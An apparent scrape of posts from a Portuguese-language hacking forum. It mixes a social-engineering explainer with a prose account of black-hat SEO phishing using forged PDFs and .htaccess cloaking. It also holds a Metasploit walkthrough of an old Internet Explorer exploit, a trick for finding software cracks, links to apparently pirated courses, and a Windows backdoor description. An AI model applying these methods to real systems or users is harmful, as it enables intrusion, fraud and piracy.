    Vocês ja devem estar enjoados de saber que nós temos o nosso lindo repositorio certo? Mas então pra quem nao sabe, vamos la. Você acha que vira pentester de uma hora pra outra? Sem estudar apenas vendo tutoriais no youtube? Vc esta errado, um pentester estuda toda hora,sem parar nunca, porque? Pois toda hora temos falhas novas, desenvolver ferramentas e tudo mais. Qual sua desculpa para não estudar? Venha conhecer nosso repositorio! Todo material que vc quiser provavelmente nós temos! Link para Download no repositório:: http://pc.cd/VfbotalK Link para Upload no Repositório: https://goo.gl/5q06O6 Senha do Repositório:: issonaoehumasenha5/9
  21. 7 points
    ATAQUES DE ENGENHARIA SOCIAL: TUDO QUE VOCÊ PRECISA SABER! Chamamos de engenharia social qualquer estratégia não-técnica usada pelos hackers que, em grande parte, dependem da interação humana e geralmente envolvem iludir o usuário para desrespeitar práticas de segurança padrão, como abrir links maliciosos, baixar arquivos suspeitos ou compartilhar informações confidenciais que permitam ao hacker atingir seus objetivos. O sucesso das técnicas de ataques de engenharia social depende da habilidade do hacker demanipular as vítimas para que executem certas ações ou ofereçam informações. Como não envolve nenhum aspecto técnico que possa ser reconhecido pelas ferramentas de segurança tradicionais, os ataques de engenharia social estão entre as maiores ameaças às empresas atualmente. ]A maior diferença entre os ataques de engenharia social e o trabalho de hacking tradicional é que os ataques de engenharia social não envolvem o comprometimento ou a exploração de softwares ou sistemas. Quando é bem-sucedido, esse tipo de ataque permite que os hackers ganhem acesso legítimo a informações confidenciais. Como funcionam os ataques de engenharia social Hackers que recorrem a ataques de engenharia social não deixam de ser fraudadores e estelionatários. Eles usam técnicas do tipo com o objetivo de ganhar acesso legítimo à rede e aos dados da empresa roubando credenciais de usuários autorizados para se passar por funcionários da própria empresa. Um dos hackers mais famosos do mundo, começou muito jovem a praticar engenharia social para pequenos ganhos. Chegou a revirar o lixo de empresas para conseguir informações e fazer telefonemas enganosos (você pode conhecer um pouco mais sobre essa história clicando É comum que esse tipo de cibercriminoso se aproveite da inocência e da natureza prestativa de alguns usuários. Eles podem, por exemplo, ligar para algum deles simulando ter de resolver algum incidente, dizendo então que necessita do acesso urgente à rede corporativa. Os ataques também podem ser feitos por meio das redes sociais. Os cibercriminosos podem apelar a uma série de sentimentos por meio dos perfis de redes sociais das vítimas, descobrindo, por exemplo, sua posição dentro da empresa, seus amigos e seus gostos pessoais. As táticas servem para convencer os usuários a abrir anexos infectados com malwares, persuadir funcionários a divulgar informações sensíveis ou até assustá-los para que instalem softwares infectados com malwares. Principais tipos de ataques de engenharia social Os tipos mais comuns de ataques de engenharia social incluem baiting, phishing, pretexting, quid pro quo, spear phishing e tailgating. Soluções como firewalls, filtros de e-mail e ferramentas de monitoramento da rede e de dados podem ajudar a mitigar essas ameaças, porém, a conscientização do usuário é a tarefa mais importante para combater os ataques de engenharia social. Contar com funcionários capazes de reconhecer e evitar os tipos mais comuns de ataques de engenharia social é a melhor defesa nesses casos. Saiba mais sobre os tipos mais comuns de ações de engenharia social a que os funcionários devem saber reagir:[/align] Baiting Por meio dessa técnica, hackers deixam à disposição do usuário um dispositivo infectado com malware, como um pen-drive ou um CD. A intenção é despertar a curiosidade do indivíduo para que insira o dispositivo em uma máquina a fim de checar seu conteúdo. O sucesso dos ataques de baiting depende de três ações do indivíduo encontrar o dispositivo, abrir seu conteúdo e instalar o malware sem perceber. Uma vez instalado, o malware permite que o hacker tenha acesso aos sistemas da vítima. A tática envolve pouco trabalho por parte do hacker. Tudo que ele precisa fazer é infectar um dispositivo e ocasionalmente deixá-lo à vista do alvo, seja na entrada ou no interior dos escritórios. O dispositivo pode ser, por exemplo, um pen-drive contendo um arquivo com nome “chamativo”, como “folha salarial 2017”. Em 2011, a Bloomberg relatou que, em um teste feito com funcionários do governo norte-americano, 60% das pessoas pegaram um pen-drive deixado no estacionamento e plugaram nos computadores do escritório. No caso dos dispositivos que tinham um logo oficial, 90% instalaram o arquivo. Phishing O e-mail de phishing, apesar de já existir há anos, ainda é uma das técnicas mais comuns de engenharia social pelo alto nível de eficiência. O phishing ocorre quando um hacker produz comunicações fraudulentas que podem ser interpretadas como legítimas pela vítima por alegarem vir de fontes confiáveis. Em um ataque de phishing, os usuários podem ser coagidos a instalar um malware em seus dispositivos ou a compartilhar informações pessoais, financeiras ou de negócio. Apesar de o e-mail ser o modo mais tradicional para o envio de phishing, esse tipo de ataque também pode vir na forma de um contato telefônica ou de uma mensagem no Facebook, por exemplo. Os piores ataques de phishing se aproveitam de situações trágicas com o objetivo de explorar a boa vontade das pessoas, fazendo com que passem informações pessoais e de pagamento para realizar doações, por exemplo. Alguns e-mails de phishing são incrivelmente fáceis de identificar, no entanto, há os que são extremamente convincentes, simulando, por exemplo, comunicações do banco e empresas de cartão de crédito e comunicados oficiais da própria empresa pedindo para que os funcionários façam download de um novo software de segurança corporativa. Pretexting Por meio do pretexting, os hackers fabricam falsas circunstâncias para coagir a vítima a oferecer acesso a informações e sistemas críticos. Nesse caso, os hackers assumem uma nova identidade ou papel para fingir que são alguém de confiança da vítima. Tudo que o cibercriminoso precisa é dar uma olhada nos perfis da vítima nas redes sociais para descobrir informações como data e local de nascimento, empresa, cargo, nomes de parentes, colegas de trabalho, amigos, entre outros. Depois, basta enviar um e-mail (ou outro tipo de comunicação) à vítima fingindo a necessidade de confirmar dados para garantir seu acesso a algum sistema específico. Pode ser, por exemplo, um e-mail supostamente da equipe de TI coagindo a vítima a divulgar suas credenciais. Quid pro quo Um ataque de quid pro quo ocorre quando um hacker requer informações privadas de alguém em troca de algo. “Quid pro quo” basicamente significa “isso por aquilo”, em que o cibercriminoso oferece algo à vítima em troca de informações sensíveis. A tática mais comum envolve se passar por alguém da TI e abordar diversas vítimas encontrar alguém com um problema real de TI. Sob instruções do hacker, a vítima então dá acesso a códigos, desabilita programas vitais e instala malwares achando que conseguirá resolver seu problema. Outra tática bastante usada é a de simular uma pesquisa em que funcionários passam uma série de informações sensíveis em troca de brindes, como canetas e canecas. Spear phishing O spear-phishing é uma forma mais sofisticada de phishing que foca em indivíduos e organizações específicas. Nesse tipo de ataque, o hacker se passa por algum executivo ou outro membro chave da empresa e aborda funcionários com intuito de obter informações sensíveis. Os cibercriminosos podem obter, por meio das redes sociais, informações sobre o alvo e o quadro organizacional da empresa. Depois disso, basta enviar alguma comunicação fingindo ser, por exemplo, um dos executivos da empresa com uma demanda urgente que requer uma transação financeira imediata para uma conta específica. Esse tipo de ataque costuma ter altas taxas de sucesso no convencimento de funcionários para que executem ações específicas ou passem informações sensíveis. Segundo o SANS Institute Report de 2016, os ataques de spear-phishing estão cada vez mais efetivos pois são tão tecnicamente convincentes que a maioria dos destinatários não se dá ao trabalho de procurar por pequenos indícios de fraude ou tentar se comunicar com o remetente por outro meio. A técnica também está sendo muito utilizada de forma direcionada para pequenas e médias empresas, pois geralmente são menos maduras em segurança. Confira o nosso artigo para saber mais! Tailgating O tailgating é uma técnica física de engenharia social que ocorre quando indivíduos não autorizados seguem indivíduos autorizados até localizações seguras. O objetivo é obter ativos valiosos e informações confidenciais. É o caso, por exemplo, de quando alguém pede para o outro “segurar a porta” porque esqueceu seu cartão de acesso, ou pede seu smartphone ou computador emprestado para fazer “algo rapidinho”, mas na verdade instala malwares e rouba dados da máquina.
  22. 7 points
    Esses são alguns PDFs sobre engenharia social que eu li, e queria compartilhar com vocês ENGENHARIA SOCIAL O FATOR HUMANO NA SEGURANÇA DA INFORMAÇÃO. .pdf Prevenção para ataques de engenharia social.pdf Técnicas de Engenharia Social .pdf Engenharia social (segurança da informação).pdf ENGENHARIA SOCIAL O ELO MAIS FRÁGIL DA SEGURANÇA NAS EMPRESAS .pdf
  23. 7 points
    Material retirado do site 0x27null Técnicas de phishing sofrem mutação a cada momento, seja por conta de um novo exploit ou pelo fato de determinada técnica não funcionar, mas uma coisa é certa o phishing sempre está em evolução.Em 2016 foi o ano que fiz minha pesquisa sobre a utilização de motores de busca no cenário de phishing onde com base em artigos, testes e um pouco de malicia consegui realizar tal conceito.Minha pesquisa consiste em mostrar algumas tricks que atacantes usam para gerar trafego legitimo em suas paginas maliciosas e ludibriar seu target ao download. O método: Tal forma simples ainda garante muitos acessos quando se trata de forjar palavras chaves e concatenar o maior numero de técnicas Black Hat SEO em um arquivo / url, efetuado o upload do maior numero de arquivos PDF's "legítimos" com palavras chaves direcionados para um grupo de interesse. Para entender o uso do PDF: Em 2008, o Google anunciou em seu blog oficial que, a partir de agora, através da Optical Character Recognition (OCR), Que permite converter imagens com texto em documentos de texto usando algoritmos decomputação automatizados. As imagens podem ser processadas individualmente (arquivos .jpg, .png e .gif) ou em documentos PDF com várias páginas (.pdf). A leitura e indexação de arquivos PDF não é novidade para ninguém, a tal ponto que criminosos também começaram a usar os benefícios de indexar documentos PDF para manipular resultados do Google.Os fraudadores usam documentos PDF fakes com palavras chaves , links e imagens para assim atingir o seu objetivo que seria destacar-se nos motores de busca. Em comparação com as páginas HTML comuns, O Google parece confiar mais e punir bem menos páginas PDF. O procurado click: O que seria fins maliciosos ?Seria direcionar o target para propagandas, exploração de vetores em seu navegador, ataques em seu roteador entre outras artimanhas. O intuito muitas vezes não é só ludibriar o target para efetuar um simples download, mas sim lucrar o máximo com seu click, se o mesmo não executar o artefato assim garante uma forma de retorno financeiro. Técnica Keyword Stuffing: Tal forma de "manipulação" é bem antiga, mas ainda bem eficaz, mas hoje a sua evolução que pude perceber no decorrer da pesquisa é o seu uso como se fosse um "Spear Phishing", sim isso mesmo um "Spear Phishing" ele é feito de forma mais aberto porem restringindo suas palavras chaves, padrão de url's e até mesmo imagens a um determinado grupo. O diferencial dessa técnica é que o pescador é passivo o mesmo não executa uma ação mais intrusiva, ele espera o acesso do seu target assim garantindo mais sucesso de infecções. Gerando arquivos em massa: Quando se trata de ações na web um atacante não quer perder tempo. Armado de seu arsenal sempre atualizado para otimizar seus processos. Por esse fato criei uma pequena tool que vai criar e injetar um conjunto de palavras chaves em nosso PDF's, para termos noção de uma estrutura final do arquivo de isca. Algumas palavras chaves que serão usadas no processo:Compre_seu,Carro_novo,usado,condicoes,gerais,semi_novo,Comprar,condições_gerais,porto_seguro,automóvel,Carro,Nossos,carros,Pick,up,SUV,Gol,VW,Up,Golf,Novo,Fox,computador,bordo,rodas,liga,leve,FRANQUIA,airbag,passageiro,freios,ABS,retrovisores,elétricos,Câmbio,automatico,automatizado,manual,Ofertas,Preços,Simular,financiamento,Fotos,Ficha,técnica,Tiguan,EXTRA... Execução da ferramenta: A lógica da ferramenta funciona da seguinte forma.Sua base é um arquivo preenchido com diversas palavras chaves direcionadas para um determinado grupo. geramos um PDF para cada palavra chave e cada palavra chave é vinculada ao nome do próprio arquivo e a ferramenta já cria links internos referenciando outros arquivos gerados, essa técnica pode ser usada como LINK FARM. PDF forjado: Usando elementos básicos de SEO é forjado o PDF isca para e é esse arquivo que o motor de busca vai indexar. Garantindo o acesso: Para "hackear" de forma expressiva e também garante o acesso das vítimas a suas (URL’S || arquivos maliciosos), O criminoso pode refinar o arquivo .htaccess de forma que o Bot de indexação (Web crawler) tenha acesso ao seu conteúdo, mas não o usuário alvo pois o mesmo é direcionado para site de terceiros. Arquivo .htaccess modificado: Lógica do atacante: isso é usado para que o motor de busca acesse o PDF forjado, porem o target só vê o cache do mesmo nos resultados assim garantindo uma engenharia social gerada pelo próprio motor de busca. Busca infectada: É uma exploração de relação de confiança entre usuário e seu aplicativo web "favorita", pois ele não vai oferecer o conteúdo "carros usados", para alguém que de suma maioria curtir páginas(facebook) ou pesquisa keywords para cinema ou faz pesquisa de Corte e Costura ou seja o target ativa o gatilho. O uso do Google AdWords: A grande trick referente conjunto de palavras chaves e potencializar o acesso é o anuncio pago que tal técnica não é só usada em motores de busca, mas também em redes sociais como Facebook. O patrocínio /anuncio pago de palavras chaves vinculadas aos seus arquivos forjados potencializa em mais de 50% as chaves de vitimas acessarem tal url infectada. Com investimento de R$50,00 por dia filtrando alvos no estado de São Paulo o atacante pode ter alcance potencial de 1K cliques + 57k de impressões. Achei o valor de 1k inflado pelo Google, mas suponhamos que tal valor real é de 500 cliques por R$50,00 analisando cenário comparativo com spammer comum o Black Hat SEO tem grande potencial spear pelo filtro avançado que própria ferramenta de propaganda oferece e pela assertividade de direcionar para pessoa certa. Em minha humilde opinião redes sociais e motores de busca serão o futuro dos spammers, tanto pela assertividade filtro avançado de perfil quanto pela facilidade de atingir milhares de pessoas facilmente. Um exemplo recente de Link patrocinado malicioso é o Fake BSOD warning, onde o usuário ao clicar no link erá direcionado para uma página que simulava a tela azul de erro Windows (famosa tela da morte). O Fake warning exibia uma mensagem orientando suas vitimas a discar o numero do "suporte" técnico, para obter a devida "ajuda". Tal anúncio patrocinado aparecia e destaque quando a palavra chave "youtube" erá buscada no Google. Contatado pela Malwarebytes, o Google AdWords removeu imediatamente os anúncios fraudulentos. A tela fake usada no modelo BSOD de ataque é uma variação das telas “Scan Virus Alert” que consiste simular um escaneamento ou um simples alerta de vírus, posteriormente oferecer uma “Ferramenta” ou telefone para auxiliar na remoção de tal vírus, apesar de não muito usada no brasil essa técnica é bem antiga. Sua nova variação e mais avançada é voltada para publico mobile, algumas versões web pedem dados do cartão de credito e utilizam functions que podem fazer seu celular até mesmo vibrar. O fluxo final seria dessa forma: O usuário toma ação de efetuar uma pesquisa, em seu resultado de busca aparece tais urls infectadas seja no orgânico ou patrocinado, depois do clique o target pode entrar em vários cenários seja de baixar um PDF infectado ou PE até mesmo ter vários vetores explorados em seu navegador ou roteador. Bom esse é um cenário simplista, mas é possivel ter noção do potencial dessa tipo de técnica. Posso afirmar que hoje meios pagos de publicidade como Google AdWords, se tornaram um dos maiores vetores que proporcionam ataques. Fraudes envolvendo em publicidade paga é outro level quando falamos de spear phishing tanto quando se trata de facilidade e retorno lucrativo. Qualquer pessoa pode criar uma conta no Google AdWords ou Facebook sem nem um tipo de verificação se X é dono da marca Y. muitas vezes o atacante usa técnicas de typosquatting para ludibriar seu target. Não só o target user é afetado por tal técnica, mas também a empresa que teve sua marca vinculada ao ataque. Ferramenta usada no post: forjaPDF (para estudos) A ferramenta usada no artigo utiliza as class do projeto Dompdf
  24. 7 points
    Exploit Pack é um programa similar ao Metasploit, multiplataforma (Windows, Linux, MacOS) e com uma interface gráfica interessante. Contém vários exploits a disposição (aproximadamente 40000 na versão full) e te dá a opção de criar seus próprios exploits na linguagem que você quiser. Informações e download: http://exploitpack.com/ http://github.com/juansacco/exploitpack OBS: É necessário ter o java instalado para rodar o Exploit Pack. https://www.youtube.com/watch?v=LSeccatqOSo
  25. 7 points
    Salve meu povão. Como o título já diz, esse post é para buscar novos moderadores para o Fórum. Estamos precisando de pessoal para auxiliar na organização do fórum. Caso tenha interesse, comente bump neste tópico, se você for um usuário ativo por aqui, entraremos em contato para mais detalhes. Valeu família.
  26. 7 points
    Fala ae hackudões, Wheezy novamente aqui com mais um post ^^ Muito material para estudos abaixo: [Alura] Big Data: Uma introdução a data analysis na prática --> https://mega.nz/#F!w0lE0CwJ!0C8jJ6gk-NnnhgCFHNTPjQ [Alura] Carreira Desenvolvedor Wordpress --> https://mega.nz/#F!I5dnjbLI!5PxZWKAGBszv1e6YS4tobw [Alura] Carreira PHP Júnior --> https://mega.nz/#F!go9yFJgY!Rc-ldt4r97ORQ3ab9mxpNQ [Alura] Curso Alura Ruby --> https://mega.nz/#F!Z8snUS7R!5lVTwqJpbzwAUJ7TMWJviQ [Alura] Docker na Prática --> https://mega.nz/#F!ktEyEbCb!bmHtvmcu8Nxe30wxDj40fw [Alura] Git: Controle e compartilhe seu código --> https://mega.nz/#F!UxdkGDzK!1mcrvVlzovSy4ZmBsjDVfw [Alura] MySQL II: Consultas poderosas --> https://mega.nz/#F!kgNkSYBZ!9v_7xpNu13VBVnR5OdDHjA [Alura] Photoshop para web I --> https://mega.nz/#F!hokxDCQL!_mW8hP9Qr8nl1_BJmbbgMw Cursos de Automação Front-end --> https://mega.nz/#F!x0kikKTJ!_StsskBfe3-zXtP8dQmgqQ Cursos de Frameworks MVC --> https://mega.nz/#F!FsFHnAxb!0HKyxSkFE-eKc_MAUuptWg Cursos de HTML e CSS --> https://mega.nz/#F!AwMgCDYL!GvRevuoSD4Il6KIWnsPhUA Cursos de JavaScript --> https://mega.nz/#F!shcSBJgQ!F-gR-ISvycxwW1DTzvfa9g Cursos de JQuery --> https://mega.nz/#F!g8knHQpA!0Q9D4L9PIYH4DKVPbl04oA Trilha Agilidade --> https://mega.nz/#F!xtsykA6B!O0Bwb8Js5q7W11Edtee2mQ Trilha Android --> https://mega.nz/#F!0xMGFBaK!tT3HTPLBkfdvRrw412OWXw Trilha C# e .NET --> https://mega.nz/#F!AoETxB6R!vLWLYCDb3-YgaRu9AzMP8A Trilha HTML e Front End --> https://mega.nz/#F!B4thnQqD!hfMguutJ7noa_F3KHOn6zA Trilha Infraestrutura --> https://mega.nz/#F!l8t3DJCT!BXcIc1Kqw0XlnQt_3thQzg Trilha Java --> https://mega.nz/#F!Up813YJB!2LHj7dhdPoA6xEsbix643g Trilha Java Avancado --> https://mega.nz/#F!s40xyD5Q!ZB3XJaJD-Hqux2QrLNcX6w Trilha Java para Web --> https://mega.nz/#F!U1FzjTAL!u7JW1V48PCYvT84f1wxkfA Trilha PHP --> https://mega.nz/#F!stsnmBrC!gqyNUwozV-yHUYCQf22pHw Trilha Ruby e Rails --> https://mega.nz/#F!x0tQQBrJ!3WF1GuxYgff3B06hOL4gTw Trilha Testes de Software --> https://mega.nz/#F!wtthUJza!oLLUrewy5pn2LJexaIxk4w http://computeirodadepressao.com/quase-2tb-terabytes-em-cursos-de-ti-para-download-o-computeiro-pirou/ THE BEST: https://mega.nz/#F!wVsCjS7A!K7jrAMW6b7RX_AC6TT3msA!EUFTxKiR http://cursos.escolalinux.com.br/curso/introducao-a-programacao-java-14-horas?ref=B4887343E Especiais ^^ 1-https://mega.nz/#F!KIRE3DDS!RSwncUf5rVV_RZ_GLu-ccA!GYgRDYIT ***************************************************************************** https://mega.nz/#F!g0ozSBYa!aAqiyDHhwltAz9Du-niZSA https://mega.nz/#F!w1hGTCBT!lXFEwX-9PwKinuIUqCFn4Q ***************************************************************************************** https://mega.nz/#F!tBYmySLR!6MYhJPB0T3xh8WjjH0H18w!4ERQTQ5K https://mega.nz/#F!ABomHbSC!8ueqTOFFddwTXrz09aKDWA **************************************************************************************** Curso Hacking https://mega.nz/#F!vVoUhSrY!CCRwM3BC7U31BaAFZHl5SQ ***************************************************************************** By: Wheezy BONS ESTUDOS!!
  27. 7 points
    Infoweb | Ferramenta para coleta de informaçoes e e-mails de sites Eae galera, codei ssa tool aqui bem simples, que faz uma requisição ao site e retorna algumas informações e endereços de e-mails. Pode ser bem útil na técnica da coleta de informações quando estiver realizando um pentest. Espero que gostem... ############################################ LINK: https://pastebin.com/L7Z3YiGK
  28. 7 points
    Eae galera este é o meu primeiro post neste fórum com intuito de compartilhar conhecimento . Então, o tutorial é sobre a exploração do Windows 7 com o uso da CVE 2010-3971. Já é um exploit antigo, pois foi descoberto em 2010, mas ainda pode-se brincar com o mesmo . Atualmente, a maioria das pessoas têm as versões de seus browsers, atualizadas. Não com as últimas atualizações, mas atualizações necessárias, para que se torne quase impossível fazer uma invasão com este exploit(é como se tivessemos a tentar invadir um servidor FTP moderno, usando o exploit VSFTPD v2.3.4, quase impossível). Por isso, que é necessário sempre fazer um fingerprint, para que seja possível descobrir o SO, versões do sistema atuais e etc, e assim poder efetuar uma invasão com base na vulnerabilidade descoberta . Então, vamos fazer uma invasão numa máquina virtual(a vossa escolha, eu estarei a usar o virtualbox),nela deverá estar instalada uma versão antiga do Internet Explorer no Windows 7(recomendado), pois somente irá funcionar nesse browser e nessa versão antiga . 1. Tendo o metasploit instalado, abra o msfconsole . 2. Selecione o exploit "exploit/windows/browser/ms11_003_ie_css_import" 3. use o comando "show options" para ver os campos que devem ser preenchidos, e caso queira mais informações em relação ao exploit, use o comando "info" . Eu recomendo apenas colocar o seu endereço ip local, e manter o resto , principalmente a porta que será usada, para a conexão com a máquina da vítima . 4. Após preencher os dados, use o comando "exploit" para colocar o metasploit no modo listening( é modo que aguarda por conexões ). E será gerado um link. 5. Copie o link que foi gerado, e abra o Internet Explorer do Windows da maquina virtual(ou da vítima), cole o link na URL do browser . 6. E por fim, com o comando "sessions", selecione a sessão onde a vítima se encontre .E pronto você está dentro da máquina da vítima . DESFRUTE! By: darkAsylum00
  29. 7 points
    Que tal aprender a hackear a si mesmo, antes de hackear os outros, você se controla a ponto do seu corpo obedecer? Taticas ninjas do subconsciente! Taticas ninjas do subconsciente! MANDAMENTOS PARA INTERIORIZAR AO LONGO DA VIDA # Não expressar tudo que se pensa. # Ouvir a todos, mas falar com poucos. # Ser amistoso, mas nunca ser vulgar. # Valorizar amigos testados, mas não oferecer amizade a cada um que aparecer: proteja-se de familiaridade e amizade com idiotas. # Não emprestar dinheiro a amigos, para não perder dinheiro e amigos. # Desconsiderar algo por amizade ou familiaridade é ganhar consideração para si. # Quando tiver grande consideração por alguém, esconda tal fato como um crime. O famoso "dou dinheiro mas não dou confiança". *(Eu não considero isso para familiares próximos) # Não contar a um amigo aquilo que um inimigo não pode saber. Assim, considere todos assuntos pessoais como secretos. Se os fatos mudarem, saber de algo a seu respeito, por mais inofensivo que seja, será desvantagem para você. # Evitar brigas, mas se for obrigado a entrar em uma: que seu inimigos o temam. # Jamais demostrar raiva e ódio nas ações. Os animais de sangue frio são os mais venenosos. # Usar roupas de acordo com sua renda, sem nunca ser extravagante. # Não emprestar dinheiro a amigos, para não perder dinheiro e amigos. # Seja fiel a você mesmo; e nunca será falso com ninguém. # Metade da sabedoria consiste em não amar nem odiar. Ficar calado e não crer em nada é a outra metade. DICAS DE CONVÍVIO PARA O DIA-A-DIA # Quando conhecer alguém novo, tente identificar a cor dos olhos da pessoa e, ao mesmo tempo, sorria. # Preste atenção nos pés das pessoas. Se você aborda duas pessoas no meio de uma conversa e eles virarem apenas o torso na sua direção, eles não querem que você participe da conversa. De forma similar, se você está numa conversa com alguém do trabalho ou faculdade e o torso dessa pessoa está na sua direção, mas os pés não estão, é sinal de que eles querem terminar a conversa. Saiba quando você é indesejado e não seja incoveniente. # As pessoas irão concordar em fazer algo para você mais facilmente se a dificuldade das tarefas dadas for gradual. (Comprometimento gradual faz com que as pessoas achem que gostam de você) # Ou, você pode pedir uma tarefa absurdamente difícil e receber um "não". Só para, em seguida, pedir uma tarefa bem mais fácil e fazer com que entrem em acordo com você. # Se você pedir um pequeno favor a alguém, a dissonância cognitiva vai fazê-la acreditar que se ela concordou em fazer um favor para você, ela provavelmente gosta de você. # Se você indagar alguma coisa a alguém e eles responderem parcialmente, apenas espere. Se você permanecer em silêncio e manter contato visual, é provável que a pessoa dê a informação completa. # Mastigue chiclete quando tiver que lidar com uma situação que lhe amedronta. Aparentemente, se nós estamos comendo algo nosso cerébro fica dopado. Ele racionaliza assim "Eu não estaria comendo se eu estivesse em perigo, então eu não estou em perigo". Isso pode te ajudar a se manter calmo. # Evite confusões nas calçadas com pessoas que estão indo na direção contrária a sua: projete seu caminho ao olhar intencionalmente acima de um dos ombros da pessoa que vem de encontro a você ou entre as cabeças das pessoas que vem em direção a você, se for mais que uma pessoa. A projeção do seu olhar lhes dirá por onde você vai. Eles irão abrir caminho ao escolher o lado que você não está projetando para si. # Quando você estiver estudando ou aprendendo alguma coisa nova, ensine o que você aprendeu para um conhecido. Deixe-os fazer perguntas. Se você for capaz de ensinar bem, quer dizer que você entendeu bem, além de ser um bom exercício de memorização. # Uma pessoa não vai se lembrar do que você disse , mas do que você a fez sentir. # Altere seu estado psicológico antes de uma entrevista ou reunião importante. Diga a si mesmo “Eu conheço estas pessoas por toda a minha vida. Somos velhos amigos prestes a nos reencontrar. Eu mal posso esperar para vê-los.” Tente visualizar o ato do aperto de mãos, o contato visual e a breve e leve conversa que antecede a reunião/entrevista. Que informações você não consegue esperar para dividir com eles? Mantenha uma pose que mostra abertura e sorria. Pode parecer clichê, mas você está sob o controle do seu estado psicológico e a força do estado em que você aparenta estar é grande. # Se você se mostrar feliz e excitado ao encontrar outras pessoas, elas vão reagir da mesma maneira. Nem sempre acontece na primeira vez, mas certamente acontecerá na próxima vez que você os encontrar. # Quando as pessoas estiverem com raiva de você; se você permanecer calmo elas irão ficar ainda mais raivosas, e se envergonharam disso depois. # Se você tiver um aperto de mãos caloroso com alguém que acabou de conhecer, a pessoa irá imediatamente te ver como alguém desejável de se ter por perto. # As pessoas têm imagens definidas sobe elas mesmas e vão agarrar-se a essas imagens com unhas e dentes. Use esta informação sabiamente. As pessoas podem deixar de gostar de você, caso você ataque a imagem que elas projetam para si mesmas. # Falsa atribuição de excitaçao: quando você sair com alguém pela primeira vez, leve-o a algum lugar excitante que fará seu coração disparar, como uma montanha-russa ou um filme de terror. Isso aumentará a produção de adrenalina que, por sua vez, fará com que a pessoa pense que está gostando mais da sua companhia do que da atividade em si. # A chave para a confiança é entrar numa sala e acreditar que todos presentes já gostam de você. # Os efeitos físicos do estresse (aumento do ciclo respirátorio, aceleração dos batimentos cardíacos etc.) espelham de maneira exata os efeitos físicos da coragem. Então, quando você estiver se sentindo estressado em qualquer situação imediatamente mude os termos do que você está sentindo: seu corpo está apenas se preparando para um ato de coragem, e não sentindo estresse. Isto é um exemplo de reenquadramento cognitivo; pesquisadores descobriram que você vai se sair melhor quando avaliar uma situação estressante como um desafio, e não como uma ameaça (física ou mental). # Faça referência ao nome das pessoas que você acabou de conhecer nas suas frases (sempre que possível). Isso irá estabelecer um senso de confiança e amizade imediato. # Sorria mais. Você se sentirá automaticamente mais feliz. # No momento em que o seu despertador te acordar, levante imediatamente e diga FUCK YEAH! # Sempre dê ao seu filho duas ou mais opções que o farão pensar que está no controle. Por exemplo, quando você quiser que ele coloque os tênis, pergunte "hoje você quer os tênis azuis ou os vermelhos?". # As pessoas são extremamente conscientes sobre seus sentidos do tato. Se alguém "acidentalmente" encostar os joelhos nos seus, eles podem agir como se não tivessem percebido, mas eles certamente sabem que vocês estão encostados. *Em todas as dicas que impliquem ações: faça da maneira mais orgânica e fluida possível. Você pode até ser um Sasuke frio e calculista, mas ninguém precisa saber. *Tenha em mente que a lista de mandamentos são para um norteio maior de si para si, pense bem antes de acrescentar algo novo àquela parte. Já a lista de dicas pode ser acrescida, sem problemas. *Leia os mandamentos sempre que possível: internalize-os, faça-os parte de si. *Tente praticar as dicas separadamente, em grupos de 3 ou 5 ou que for melhor para você, no seu dia-a-dia. Tentar absorver tudo ao mesmo tempo será bem difícil. espero que gostem e se quiserem encaixar mais alguma coisa , falem nos comentários vamos criar o maior manual hacker humano já visto!
  30. 7 points
    Tutorial básico de como achar cracks/seriais de programas: 1. Vá no google e digite 2. 94fbr NOMEDOPROGRAMA 3. O resultado mostrara links do programa com crack e seriais Exemplo: 94fbr photoshop CS6
  31. 7 points
    PRINCIPAIS CANAIS DO YOUTUBE SOBRE TECNOLOGIA/HACKER Penetration Testing Alef Carvalho Alisam Technology Ares TI CaveiraTech Ciência Hacker Clavis Segurança da Informação Crazy Danish Hacker d1gg3r us Darkcode Hacking DEDSEC TOOL Deep Web Brasil DioLinux Diego Maciel Esecurity Treinamentos FenixSec Fábrica de Noobs Koshimaru Kisara Pesadelo Do Sistema Limon Tec Life Hacker Papo Binário Programação e Hacking Ricardo Longatto Roadsec Segurança Digital Sombra Hp Magno Tutor Portal Geek Live Xtreme Security Segurança Cavinato Hacker Security Nicholas Ferreira Jonatas Fil
  32. 7 points
    Arquivos PDF disponíveis para Download. Apostila-Básica-Sobre-Hardware.pdf Hardware_o_guia_definitivo.pdf cursoMontagemManutencao.pdf Apostila Hardware.pdf Apostila Sobre Hardware.pdf Hardware curso completo 3 edição.pdf
  33. 7 points
    Hoje trago a vocês um modulo desenvolvido a partir das ferramentas utilizadas pela NSA, foi apenas uma demonstração de como ela funciona, está falha está afetando diversas versões do Windows tornando-a uma grave falha para usuários do Windows, ela é executada junto com o processo do windows, variando a versão da arquitetura "x64 lsass.exe / x86 wlms.exe " com isso a modulo acaba gerando um backdoor diante desses processos, que acaba dificultando a visibilidade do backdoor, é acaba sendo quase "impossível" dele fechar o processo. Caso vocês se manifeste, irei fazer uma part.2 do video ensinando a adicionar o modulo é dando algumas dicas é explicações sobre a falha. VERSÕES AFETADAS 1 Windows XP (all services pack) (x86) (x64) 2 Windows Server 2003 SP0 (x86) 3 Windows Server 2003 SP1/SP2 (x86) 4 Windows Server 2003 (x64) 5 Windows Vista (x86) 6 Windows Vista (x64) 7 Windows Server 2008 (x86) 8 Windows Server 2008 R2 (x86) (x64) 9 Windows 7 (all services pack) (x86) (x64)
  34. 6 points
    Ola Amigos, Segue abaixo o link do livro boa leitura a todos. Livro: Hackers Expostos - Segredos e Soluções - 7ª Ed. 2014 Link: https://drive.google.com/open?id=0B1b9fJFscUuySkFBZFhIcEpjWGc ==============================================Gustavo Henrique EsserBacharelado em Sistemas de InformaçãoSkype: gustavo.leonardi1===============================================
  35. 6 points
